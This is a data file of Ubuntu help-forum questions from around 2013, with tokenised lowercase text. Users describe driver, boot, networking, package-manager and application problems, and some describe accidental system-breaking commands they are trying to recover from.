358466	c++ graphics xcb error - ubuntu 12.04	the code given below runs properly but crashes after few seconds . # include < iostream > # include < graphics.h > using namespace std ; int main ( ) { int gd=detect , gm ; int i , x , y ; initgraph ( & gd , & gm , null ) ; line ( 0,0,640,0 ) ; line ( 0,0,0,480 ) ; line ( 639,0,639,480 ) ; line ( 639,479,0,479 ) ; for ( i=0 ; i < =1000 ; i++ ) { x=rand ( ) % 639 ; y=rand ( ) % 480 ; putpixel ( x , y,15 ) ; } getch ( ) ; closegraph ( ) ; } and the error which i got is : [ xcb ] unknown sequence number while processing queue [ xcb ] most likely this is a multi-threaded client and xinitthreads has not been called [ xcb ] aborting , sorry about that . star : ../../src/xcb_io.c:274 : poll_for_event : assertion ` ! xcb_xlib_threads_sequence_lost ' failed . [ xcb ] unknown sequence number while processing queue [ xcb ] most likely this is a multi-threaded client and xinitthreads has not been called [ xcb ] aborting , sorry about that . star : ../../src/xcb_io.c:274 : poll_for_event : assertion ` ! xcb_xlib_threads_sequence_lost ' failed . aborted ( core dumped ) please help ! thanks in advance .
358471	w2web : command not found	i 'm a physic student and want to install wien2k_13 in my system . i 've already installed ifort . but when i try to compile wien2k , there is some error like : '' no makefile.orig in src_w2web , leaving directory . '' and when i type w2web in terminal , it says : `` w2web : command not found '' . what can i do ? i should say that i 'm new in ubuntu ! thanks
358472	how to find out what package contains some perl module	here is the task . i need to install some cpan module on my ubuntu computer . i want to install it from deb package so i need to find out what package contains that module . sometimes the solution for this task is pretty simple . for example if i need to install file : :find : :rule i just convert the name to lowercase , change : : to - and add lib to the beginning and -perl to the end . the result is the package name libfile-find-rule-perl : $ apt-cache search libfile-find-rule-perl libfile-find-rule-perl - module to search for files based on rules but in other cases this is not working . i want to find deb package that contains debian : :aptcontents . but apt-cache search libdebian-aptcontents-perl finds noting . well , in the case of debian : :aptcontents i know that it is situated in the package dh-make-perl , but i want to find out the way how to find what deb package contains the module i need .
358476	why does n't wifi work on dell 4020 ?	i have installed ubuntu 12.04 on my dell 4020 laptop using windows installer for ubuntu . but my wifi device is not working . what should i do ? $ lspci | grep -i net 07:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 )
358477	installing ubuntu12.04 64-bit on vmware	while installing ubuntu 12.04 desktop on vmware workstation it hangs when reticulating splines . how long do i have to wait ?
358480	ubuntu - does not allow to write in disk , in the middle of work , after restart it does the same unless its rebooted and used f	everyday my laptop in the middle of work , stop to save any files to the disk , and then nothing works when i do reboot , it stays in the boot screen with following screen shot , unless i physically press f or other options how do i resolve this issue permanently to not happen in the middle of work ?
358482	global media keys	i 've assigned keyboard media keys - play/pause , next , previous to vlc . problem is , they only work if vlc window is in focus , which kind of looses the purpose , because i 'd like to skip tracks while i 'm working in other windows . just to note - windows 8 had this functionality . bottom line : is it possible to make media keys work in ubuntu globally ? my version of ubuntu is 13.10 ( saucy salamander ) .
358487	setting up webserver with ispconfig : mail configuration	i have installed my ubuntu 12.04 web server following the guide available on how to forge . then , i have created one client in ispconfig . using this client , i have a domain ( example.com ) and a mailbox ( client @ example.com ) in the e-mail configuration of ispconfig . i do not use any dns system on my server ( though bind has been installed by the procedure ) and i have setup my registrar 's dns ( ovh ) for the domain as follow : .example.com ns their main server name .example.com ns their secondary server name .example.com mx 1 example.com .example.com mx 100 example.com .example.com a my_server_ip www.example.com a my_server_ip mail.example.com cname example.com smtp.example.com cname example.com i can see the mailbox using the webmail , but : â i ca n't use it to send mails ( composing a new mail and hitting send does n't do anything ) â when i send mails to client @ example.com , the webmail does n't report anything in the inbox . when i try to setup the mailbox ( imap ) using a client ( apple mail ) i can go through the imap setup ( apparently , mail is able to contact the server mail.example.com and log in ) but i ca n't setup the smtp on smtp.example.com or on mail.example.com or on example.com . the request times out . what 's wrong with my setup ? here are the latest mail logs . i have replaced my domain by example.com and the ip address from my router at home by my_home_ipv4_address . that 's probably either attempts from apple mail to check smtp and imap for the mailbox i tried to configure , or to send an e-mail towards client @ example.com . remark : of course , my server is configured with the real domain name , not with example.com
358488	my kvm guests ( domains ) hang after adding swap	i 've just started to use kvm on my remote server and i 've already overcomed a lot of problems but now i 'm stuck with this problem . : all my guests ( domains ) does not boot properly . they hang after adding the swap . the cpu is not strained . here are some info ( tell me if i shall include more info ) guest kernel : $ virt-cat test /boot/grub/menu.lst | grep kernel kernel /boot/vmlinuz-3.5.0-41-generic root=uuid=55551297-9c91-43f9-95e0-b315ff5d743c ro console=ttys0 guest fstab : $ virt-cat test /etc/fstab proc /proc proc defaults 0 0 /dev/sda2 swap swap defaults 0 0 /dev/sda1 / ext4 defaults 0 0 guest network $ virt-cat test /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.122.2 netmask 255.255.255.0 network 192.168.122.0 broadcast 192.168.122.255 gateway 192.168.122.1 trying to boot guest : $ virsh 'start test -- console' ... usual stuff , then last relevant lines : [ 0.455009 ] ata1.00 : configured for mwdma2 [ 0.455787 ] scsi 0:0:0:0 : direct-access ata qemu harddisk 1.2 . pq : 0 ansi : 5 [ 0.457799 ] sd 0:0:0:0 : [ sda ] 10485760 512-byte logical blocks : ( 5.36 gb/5.00 gib ) [ 0.459482 ] sd 0:0:0:0 : [ sda ] write protect is off [ 0.460644 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 [ 0.461851 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 0.464652 ] sda : sda1 sda2 [ 0.465057 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 0.466462 ] freeing unused kernel memory : 932k freed [ 0.467167 ] write protecting the kernel read-only data : 12288k [ 0.470127 ] freeing unused kernel memory : 1464k freed [ 0.472920 ] freeing unused kernel memory : 1132k freed loading , please wait ... begin : loading essential drivers ... done . [ 0.485455 ] udevd [ 87 ] : starting version 175 begin : running /scripts/init-premount ... done . begin : mounting root file system ... begin : running /scripts/local-top ... done . [ 0.596602 ] fdc 0 is a s82078b begin : running /scripts/local-premount ... done . [ 0.632547 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) begin : running /scripts/local-bottom ... done . done . begin : running /scripts/init-bottom ... done . [ 0.903391 ] ext4-fs ( sda1 ) : re-mounted . opts : ( null ) [ 0.906697 ] adding 999420k swap on /dev/sda2 . priority : -1 extents:1 across:999420k then nothing happens , the guest just sits there . [ update ] i increased verbosity of the kernel and i could get more information : [ 1.231109 ] adding 999420k swap on /dev/sda2 . priority : -1 extents:1 across:999420k [ 1.244025 ] refined tsc clocksource calibration : 3192.731 mhz . [ 1.264637 ] udevd [ 318 ] : starting version 175 [ 1.302264 ] init : plymouth-log main process ( 337 ) terminated with status 1 [ 1.307553 ] microcode : cpu0 sig=0x623 , pf=0x0 , revision=0x1 [ 1.326948 ] piix4_smbus 0000:00:01.3 : smbus host controller at 0xb100 , revision 0 [ 1.464944 ] microcode : cpu1 sig=0x623 , pf=0x0 , revision=0x1 [ 1.467969 ] microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba [ 2.211711 ] input : imexps/2 generic explorer mouse as /devices/platform/i8042/serio1/input/input2 [ 6.489041 ] init : udev-fallback-graphics main process ( 533 ) terminated with status 1 [ 11.499114 ] init : console-font main process ( 548 ) terminated with status 71 [ 11.514816 ] init : plymouth-splash main process ( 566 ) terminated with status 1 i first tried to disable some hardware for the vm ( mouse , video , ... ) but it did n't solved anything . then i tough that it might be the use of framebuffer console font that would prevent virsh to output the console . i tried various way in order to disable framebuffer but it did n't changed either . so i 'm wondering what could be all those processes that terminate with status ! = 0 . especially console-font and udev-fallback-graphics
358489	ubuntu 12.04 does n't work on 3d mode after i installed drivers for wrong graphics card	i am quite new to ubuntu . i accidentally installed wrong graphic card ( amd radeon 5500m ) . but mine is intel hd 4000 . now my ubuntu works on 2d mode and i have lots of graphical issues .
358491	unable to turn on recommendations in ubuntu software center	when i start software-center from the terminal , i get the following output : 2013-10-13 12:43:41,231 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-10-13 12:43:41,414 - softwarecenter.region - warning - failed to use geoclue : 'org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.geoclue.master was not provided by any .service files' 2013-10-13 12:43:41,618 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-10-13 12:43:41,621 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2013-10-13 12:43:41,627 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-10-13 12:43:41,627 - root - error - could not find any typelib for launchpadintegration 2013-10-13 12:43:41,696 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2013-10-13 12:43:43,495 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/share/software-center/softwarecenter/utils.py ' , 271 , 'get_title_from_html ' ) ' 2013-10-13 12:43:43,495 - root - warning - failed to parse : ' < div style= '' background-color : # 161513 ; width:1680px ; height:200px ; '' > < div style= '' background : url ( '/site_media/exhibits/2013/09/aamfp_leaderboard_700x200_1.jpg ' ) top left no-repeat ; width:700px ; height:200px ; '' > < /div > < /div > ' ( 'ascii ' codec ca n't encode character u'\xa0 ' in position 70 : ordinal not in range ( 128 ) ) 2013-10-13 12:43:46,266 - softwarecenter.region - warning - failed to use geoclue : 'org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.geoclue.master was not provided by any .service files' 2013-10-13 12:43:47,452 - softwarecenter.db.utils - info - software-center-agent finished with status 0 when i press the 'turn on recommendations ' button , i get the following : 2013-10-13 12:48:26,466 - softwarecenter.backend.login_impl.login_sso - error - _on_credentials_error for ubuntu one : dbus.dictionary ( { dbus.string ( u'errtype ' ) : dbus.string ( u'guinotavailableerror ' ) , dbus.string ( u'message ' ) : dbus.string ( u'can not find a gui to present to the user ( tried with `` ( \'ubuntu-sso-login-qt\ ' , \'ubuntu-sso-login-qt\ ' ) '' ) . aborting . ' ) } , signature=dbus.signature ( 'ss ' ) ) ( ) 2013-10-13 12:48:26,467 - softwarecenter.backend.login_impl.login_sso - error - _on_credentials_error for ubuntu one : dbus.dictionary ( { dbus.string ( u'errtype ' ) : dbus.string ( u'guinotavailableerror ' ) , dbus.string ( u'message ' ) : dbus.string ( u'can not find a gui to present to the user ( tried with `` ( \'ubuntu-sso-login-qt\ ' , \'ubuntu-sso-login-qt\ ' ) '' ) . aborting . ' ) } , signature=dbus.signature ( 'ss ' ) ) ( ) i 'm running xubuntu 13.10 . i think i accidentally removed a wrong package .
358492	lenovo e335 starts up in hibernation mode and wont wake up after running sudo pm-hibernate	i 'm a bit of a ubuntu-newbie but this i my problem : i bought my lenovo thinkpad edge 335e a few weeks ago and i 'm running ubuntu 13.10 on it with no major problems . the sole annoyance has been that it wont wake up from hibernation , which seems to be a quite common problem . well i looked around here trying to fix it and tried the sudo pm-hibernate command and what happened was that my computer restarted and started in hibernation mode and wont wake up . there were a few messages before it restarted but i had no time to read them . so , now my computer starts in hibernation mode and wont wake up , i 've tried to start in safe mode ( using shift ) but the screen 's just black . i 've tried plugging in the usb-stick that i used to install ubuntu , still just black . i can hear the hard drive spinning a bit after restart but nothing more . the light is on . i ca n't enter any commands . please help as i have a lot of work on my computer that i require access to . ohyeah , i 'm using the non-proprietary graphics drivers .
358494	ubuntu boot too slow	i am using an ubuntu machine with 12.04 for the last year . the performance was always quite good even the hardware was a bit slow . now suddently after a shutdown the machine requires too much time to boot ubuntu and to log in to my user . it took 20 minutes to boot to my user and the hard drive led is always on . what may have happened to the machine ? i have a dual boot with windows . i was able to boot windows . maybe its a failure of the file system ?
358497	why terminal responds very slow ?	i have faced this annoying behavior of terminal in gnome under ubuntu 12.04.2 lts . even the first time i open the terminal , it starts blinking and after 1-2 min , gives the message groups : can not find name for group id 1096358339 after that , it operates normally . but every tab in terminal or new terminal , the same story . any idea why ? and when i try to find the group by cat /etc/group | grep `` 1096358339 '' i do not get any output ( also running sudo takes ages ) .
358498	there 's no connect button on vpn	so i 'm quite a noob with ubuntu so far , i 'm trying to run a pptp vpn connection on my ubuntu 13.04 and i did it via network connections , now that i want to connect to it when i 'm going to network there 's my vpn connection with an on/off switch , when i turn it to on practically nothing happens . i wonder what 's wrong with this , i 'd appreciate any help , thanks .
358499	how to make chromium browser look nativein kde	i am trying to make chromium browser look nativein kde , and i have followed instructions from here . everything looks ok except there is a line under the title bar . anyone knows how to eliminate it ? thanks ! here is the browser and system version info : version 29.0.1547.65 kubuntu 13.10 ( 29.0.1547.65-0ubuntu2 )
358500	change mouse hover popup color	is there some way to change the background of the popup , that is shown when you hover on some element in the gui , like the string '507 bytes ' in this picture , to white and the string to black ?
358501	on teamviewer connection between 13.04 to 12.10 computers , short cut strokes do not work ?	i am running teamviewer 8 from my laptop 13.04 ubuntu to workstation with ubuntu 12.10 and i can not use short cuts ( like alt+tab ) on the connected machine . however i experienced that all of those short-cuts are available if i connect from win8 . do i need to have specific ubuntu settings for having available those keys or is there any other solution to that problem ?
358504	copy iso to another partition	first i have two partitions , `` / '' for systems and `` /home '' for datas . i want to copy a dvd image through brasero but it keeps telling me to copy it to my `` / '' partition . is there any way to save it to the other partition ?
358507	why wo n't vlc play the dialog in a dvd ?	i 'm trying to watch a dvd on my laptop using vlc . the background sounds and music play fine but the dialog is non existent . in vlc the audio > devices and audio > channels are both inactive . if i look at the sound settings there does n't seem to be anything there except volume and balance . the speakers and headphones are the same . the laptop is a dell 1525 and lspci reports audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) if i rip the dvd using handbrake everything is fine .
358508	font garbled on remote desktop from 13.04	when i try to take remote desktop of my windows pc the font get grabled ( especially the small letters , cap letters are displayed properly ) . i face this issue only in ubuntu 13.04 also in lubuntu 13.04 . fyi , it is working perfectly in both ubuntu/lubuntu 12.10 . i am taking remote with help of java plugin . please share me your thoughts on this to fix it .
358509	ubuntu 12.10/ kubuntu not starting after i used a command sudo apt-get remove -- purge cairo*	it has deleted everything and now when i switch the pc on . a black screen appears saying hw activator , start and all . i have tried to recover boot , but it has helped . http : //paste.ubuntu.com/6230749 . the problem started when i thought i will uninstall cario- for knowing how to do that i used web but they told me to use sudo apt-get remove -- purge cairo* and everything got deleted and i am unable to open desktop as i previously did .
358511	automatic proxy configuration for sublime text 2 package control	i am currently on a ubuntu 13.04 machine behind a proxy server at college . i have configure the proxy settings for package control by editing the user-settings file . however when i am not behind a proxy server , do i need to manually delete those entries ? is there some way to add multiple proxies and switch between different proxy settings in sublime text2 ?
358513	ubuntu 12.04 - lockout	having tried to update in nividia drivers i rebooted my pc , instead of my usual signin screen screen i got the following screen : user name password then : xxxx @ xxxx-desktop : ~ $ . - what command or text must i enter to get back into my ubuntu ?
358518	frozen desktop on dell xps 14 ultrabook	i have a problem with my novel installation of ubuntu . sometimes , the system crashes : the monitor still show the desktop environment , but it is frozen or blocked and the only think that i can do is to press the power button and shot down . it there a way to understand which kind of problem is ? driver video , perhaps ? how can i do a better diagnosis ? the system is ubuntu precise , installed on a dell xps 14 ultrabook , whith sputinik kernel and bumblebee drivers for the nvidia card . thanks ! ! !
358521	why ca n't i connect to wireless ?	originally it was just my home wifi . so i started using my wireless `` egg '' to connect to the internet or my cell phone hotspot . now i ca n't connect to those either . my home wireless does n't even show up anymore as a wireless option ( although it does on other devices ) , and for my egg and phone hotspot it just continually searches and searches without connecting . iwconfig : lo no wireless extensions . eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : on eth0 no wireless extensions . what sorts of things would you like to see to help me ? thanks ubuntu community !
358523	gnome power manager issue . how to fix ?	i am using ubuntu for business . i do n't know what happened , but now my computer does not open . there is a message on the down right side of the computer that reads : install problem the configuration defaults for gnome power manager have not been installed correctly . please contact your computer administrator . how to re-install gnome power manager how can i delete a directory , using command prompt , especially for some corrupted folders and files ?
358525	how install gtk+ 3 for python	i 'm start programming in python and i want learn gtk+ 3 . i 'm using a distro based on ubuntu 12.04 ( elementary os ) and i 'm having some troubles to install gtk+ 3 in python . okay , i will show you what i 'm trying do . first - > following this tuto , i wrote this simple code for generate a window using gtk+ 3 . # ! /usr/bin/python from gi.repository import gtk win = gtk.window ( ) win.connect ( `` delete-event '' , gtk.main_quit ) win.show_all ( ) gtk.main ( ) second - > i have the following error : traceback ( most recent call last ) : file `` main.py '' , line 4 , in < module > win = gtk.window ( ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 243 , in __getattr__ return getattr ( self._introspection_module , name ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 105 , in __getattr__ self.__name__ , name ) ) attributeerror : 'gi.repository.gtk ' object has no attribute 'window' third - > trying to find the error , i found this guide that i skipped before try to run `` main.py '' . i 'm trying to follow this guide because i do n't know if elementary ( ubuntu 12.04 ) have gtk+ 3 , pygobject and other things necessary for develop gtk+ 3 applications with python , by default . forth - > summarizing , i 'm having problems trying to install jhbuild . i successfully followed this guide of how to install jhbuild until 2.1 item . but when i try to run jhbuild sanitycheck i have the following error message : jhbuild : could not load config file , /home/paladini/.jhbuildrc is missing how can i solve this issues and finally use gtk+ 3 with python ?
358526	errors on updating ubuntu server	err http : //archive.ubuntu.com hardy-updates/main sources 404 not found [ ip : 91.189.92.202 80 ] hit http : //eu-west-1.ec2.archive.ubuntucom precise/main translation-en hit http : //eu-west-1.ec2.archive.ubuntu.com precise/multiverse translation-en hit http : //eu-west-1.ec2.archive.ubuntu.com precise/universe translation-en hit http : //eu-west-1.ec2.archive.ubuntu.com precise-updates/main translation-en hit http : //eu-west-1.ec2.archive.ubuntu.com precise-updates/multiverse translation-en err http : //archive.ubuntu.com hardy-updates/multiverse sources 404 not found [ ip : 91.189.92.202 80 ] hit http : //eu-west-1.ec2.archive.ubuntu.com precise-updates/universe translation-en err http : //archive.ubuntu.com hardy-updates/main amd64 packages 404 not found [ ip : 91.189.92.202 80 ] hit http : //eu-west-1.ec2.archive.ubuntu.com precise-backports/main translation-en err http : //archive.ubuntu.com hardy-updates/multiverse amd64 packages 404 not found [ ip : 91.189.92.202 80 ] hit http : //eu-west-1.ec2.archive.ubuntu.com precise-backports/multiverse translation-en err http : //archive.ubuntu.com hardy-updates/main i386 packages 404 not found [ ip : 91.189.92.202 80 ] hit http : //eu-west-1.ec2.archive.ubuntu.com precise-backports/restricted translation-en err http : //archive.ubuntu.com hardy-updates/multiverse i386 packages 404 not found [ ip : 91.189.92.202 80 ] hit http : //eu-west-1.ec2.archive.ubuntu.com precise-backports/universe translation-en ign http : //archive.ubuntu.com hardy-updates/main translation-en_us ign http : //archive.ubuntu.com hardy-updates/main translation-en ign http : //archive.ubuntu.com hardy-updates/multiverse translation-en_us ign http : //archive.ubuntu.com hardy-updates/multiverse translation-en w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy-updates/main/source/sources 404 not found [ ip : 91.189.92.202 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy-updates/multiverse/source/sources 404 not found [ ip : 91.189.92.202 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy-updates/main/binary-amd64/packages 404 not found [ ip : 91.189.92.202 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy-updates/multiverse/binary-amd64/packages 404 not found [ ip : 91.189.92.202 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy-updates/main/binary-i386/packages 404 not found [ ip : 91.189.92.202 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy-updates/multiverse/binary-i386/packages 404 not found [ ip : 91.189.92.202 80 ] e : some index files failed to download . they have been ignored , or old ones used instead .
358527	version of ubuntu for fujitsu ah502 lifebook ?	i have recently placed an online order for fujitsu lifebook ah502 the laptop is yet to be delivered . i was about to download 64-bit ubuntu 13.04 , thinking that my laptop is 64 bit . but this is amd version . does it make difference ( that my laptop will be intel ) ? or should i download 32 bit version ? will it work better on my machine ? is there any other variant of ubuntu that will work better on my machine ?
358529	how can i install ubuntu without an internet connection ?	i do not have a very fast internet connection , so ideally i want to download ubuntu with all of the packages i require so i can install them all from cd/dvd/usb without the need to use my internet connection for downloading additional packages . specifically , i need to ensure that i have all of the plugins required for video and audio playback , amongst others . what is the best suitable version to achieve this ?
358532	how can i recover from accidental chown -r	i am an ubuntu newbie , and i accidentally typed chown www-data : www-data * -r. after a while , i tried to restart , but my computer could n't even start , saying : # your screen , graphics cards , and input device settings could not be detected correctly . # you will need to configure these yourself . the command i executed is like this : cd /home sudo chown www-data : www-data * -r sudo usermod -a -g www-data username is there any way i can get out of this mess ? thank you
358536	run eclipse on nexus 7 with ubuntu 13.04 desktop	i want to develop simply java app ( without gui ) on my nexus 7 ( 2012 ) running ubuntu 13.04 and i have a question . i installed ubuntu 13.04 on my nexus 7 ( 2012 ) , installed jdk-7u10-ea-fx-8_0_0-embedded-linux-arm-sfp.tar.gz . after this i downloaded eclipse standard 4.3.1 , extracted it and tried to run the eclipse executable , but nothing happened . can someone help me ?
358537	error : no such partition	i took an empty partition on my hard disk , and put it into a gtp ? ? ? file and made it primary . when i restarted my laptop i got the following error message : no such partition grub rescue > now i 'm stuck . i tried to recover with a windows 7 dvd , but it says it 's not compatible with windows . i bought the laptop with ubuntu 12.04 on it , and now i want to install windows 7 , but i ca n't install it and i ca n't remove ubuntu . now i 'm stuck , and do not know what else i can do . please someone help .
358544	deja dup gets stuck on `` preparing ... '' or `` reading ... '' ( when backing up )	a week ago , i upgraded to ubuntu 13.10 ( with deja-dup 27.3.1-0ubuntu1 ) . since then , deja dup has n't been able to complete any backups . it goes through preparing , and in the beginning , it managed to get to reading . then , it would list 101 files in the details window . after that , the progress bar keeps spinning back and forth , but there 's no disk nor network activity . the system monitor reports deja-dup as running , but the sub-process duplicity is sleeping . all the files it lists are small , most of them 1kb-1000kb . after an update ( ? ) a few days ago , it ca n't even get past preparing . now , it doese n't start any subprocess , and it often freezes . what i 've tried : -giving it a empty backup destination and setting it to ignore the last file it lists . no difference . -when running `` deja-dup -- backup '' in a terminal , i get a empty ( white ) window and no terminal output . -after i start the backup , i am unable to open the backup settings or to retry the backup until i reboot the computer . the same happens if i start , then cancel/postpone the backup before opening settings or restarting the backup . -i have also tried removing ~/.cache/deja-dup folder , but it does n't seem to make any difference . any idea how i can get it to work again ? or can anyone recommend a similar program ?
358545	wireless not working when running 12.04 from usb	i 'm trying to see if ubuntu will work for me on my old laptop . i created a bootable usb drive for 12.04 i have n't done the proper installation yet . i selected the `` try ubuntu '' option and run it off of the usb stick just to see how it would look on my laptop . everything seems fine except i ca n't get my wireless card working . when i try to activate the broadcom driver it results in an error message . will this problem persist once i do a full install ? i 'd like to know before i take the plunge .
358547	trying to uninstall open office 3.4 ubuntu 13.4	i tried so many ways to remove open office 3.4 , trying to upgrade to 4.0 . i 've done every command i could find . i resorted to deleting the openoffice.org and openoffice.3org directories . i guess the files are gone , but now im left with open office icons still in my launcher and applications location . if i try and install openoffice 4 it fails when trying to build the icons ... . lost !
358551	problem installing ripple	i have a fresh installation of ubuntu 12.04 , and have followed all os-specific ripple build instructions on the ripple wiki . all works fine through the section of the ripple wiki called : getting the repository , then it all starts to go wrong . under the heading : configuration , this is what happens : set path= ( node_modules/buster/bin $ path ) returns bash : syntax error near unexpected token ´ ( ' path=node_modules/buster/bin : $ path is accepted cp test/config-example.js test/config.js returns cp : can not stat ´test/config-example.js´ : no such file or directory node test/module-test.js returns module.js:340 throw err ; error : can not find module ´/test/module-test.js´ at function.moudle blablablablablablablablablablablablablablablabla at node.js:901:3 npm test returns error : enoent , open ´/package.json´ blablablablablablablablablablablablablablablabla error : eacces , open ´npm-debug.log´ blablablablablablablablablablablablablablablabla burster test returns burster : command not found scons returns scons : *** no sconstruct file found . file `` /usr/lib/scons/scons/script/main.py '' , line 904 , in_main
358558	12.04 wpa issue on hp-pavilion-g7-notebook	$ nm-tool networkmanager tool state : connected ( global ) device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : ec:9a:74:4d:51:10 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.3 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1 device : eth1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : wl state : disconnected default : no hw address : e4 : d5:3d:9e:65:86 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points now i have a connection called 123 ( ssid name ) , mode : infrastructure ( else it only understands wep and not wpa/2 security settings , which is what i have ) , bssid : none , device mac address ( -the mac address for eth1 ) , no cloned mac and mtu automatic , also ipv4 automatic dhcp and security wpa and wpa2 personal . the password is ok and with the same router ( providing both wired and wireless access ) , the connection works on other machines , but on this machine it just asks for the password and never connects . so what is the problem here ?
358560	software center frozen/broken and sudo apt-get broken	so i keep trying to install things on my laptop and whenever i try to use sudo apt-get i get the same errors every time , systemerror : e : read error - read ( 5 : input/output error ) , e : the package lists or status file could not be parsed or opened . also whenever i try to open software center through my desktop icon it will just freeze leaving me to force quit . if i try to use the command software-center in my terminal i get the longest list in the world which is , che.open ( ) traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gi/overrides/glib.py '' , line 629 , in < lambda > return ( lambda data : callback ( *data ) , user_data ) file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 261 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 105 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 150 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : read error - read ( 5 : input/output error ) , e : the package lists or status file could not be parsed or opened . 2013-10-13 10:13:52,685 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gi/overrides/glib.py '' , line 629 , in < lambda > return ( lambda data : callback ( *data ) , user_data ) file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 261 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 105 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 150 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : read error - read ( 5 : input/output error ) , e : the package lists or status file could not be parsed or opened . 2013-10-13 10:13:57,365 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gi/overrides/glib.py '' , line 629 , in < lambda > return ( lambda data : callback ( *data ) , user_data ) file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 261 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 105 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 150 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : read error - read ( 5 : input/output error ) , e : the package lists or status file could not be parsed or opened . that 's only about one-tenth of the list which is too long to read . i need help , if anyone has an answer please respond
358561	ca n't get unity to log-in , instantly crashes to main login screen	recently did a clean install of 13.10 , everything was going great . then i installed the new cinnamon 2.0 desktop from the ppa . when i logged in , it seemed to work ( except that it did n't register touch 's on the clickpad as clicks ) . afterwards , i logged out of cinnamon to log back into unity , but it immediately crashes back to the login screen . i can log into gnome flashback without issue . i 've removed cinnamon , but the problem still persists .
358563	hugetlbfs configuration to use exactly a certain value of ram memory	for some reason i need to use the max . capacity of one server of 31gb ram on 64 architecture . the question is how to get to know the exact value configuration of the hugepages numbers ? the actual configuration using grep -i huge /proc/meminfo is : hugepages_total : 0 hugepages_free : 0 hugepages_rsvd : 0 hugepages_surp : 0 hugepagesize : 4096 kb
358565	can not access tor ownership	i 've tried the recommended options to gain ownership of tor browser and am still not successful . this is the script i got : sudo chown $ user-rv~/.tor-browser chown : missing operand after `m-rv~/.tor-browser' try `chown -- help ' for more information . m @ m : ~ $ sudo chown -r username /usr/bin/tor-browser < br > bash : syntax error near unexpected token `newline' m @ m : ~ $ sudo chown-r username /usr/bin/tor-browser [ sudo ] password for m : sudo : chown-r : command not found i have no idea where i went wrong with this . tor browser has downloaded successfully , but it ca n't be activated .
358567	asus q301l - installation black screen	i cant install ubuntu . i tried 12.04 13.10 both with the 64 version . and the 12.04 32 bits version . i disable fast boot , i cant found and i dont know if i have the intel srt . i boot my pendrive with the uefi - pendrive option and whatever i choose.. try ubuntu or install ubuntu . my computer gets the black screen and nothing . thanks in advance regards
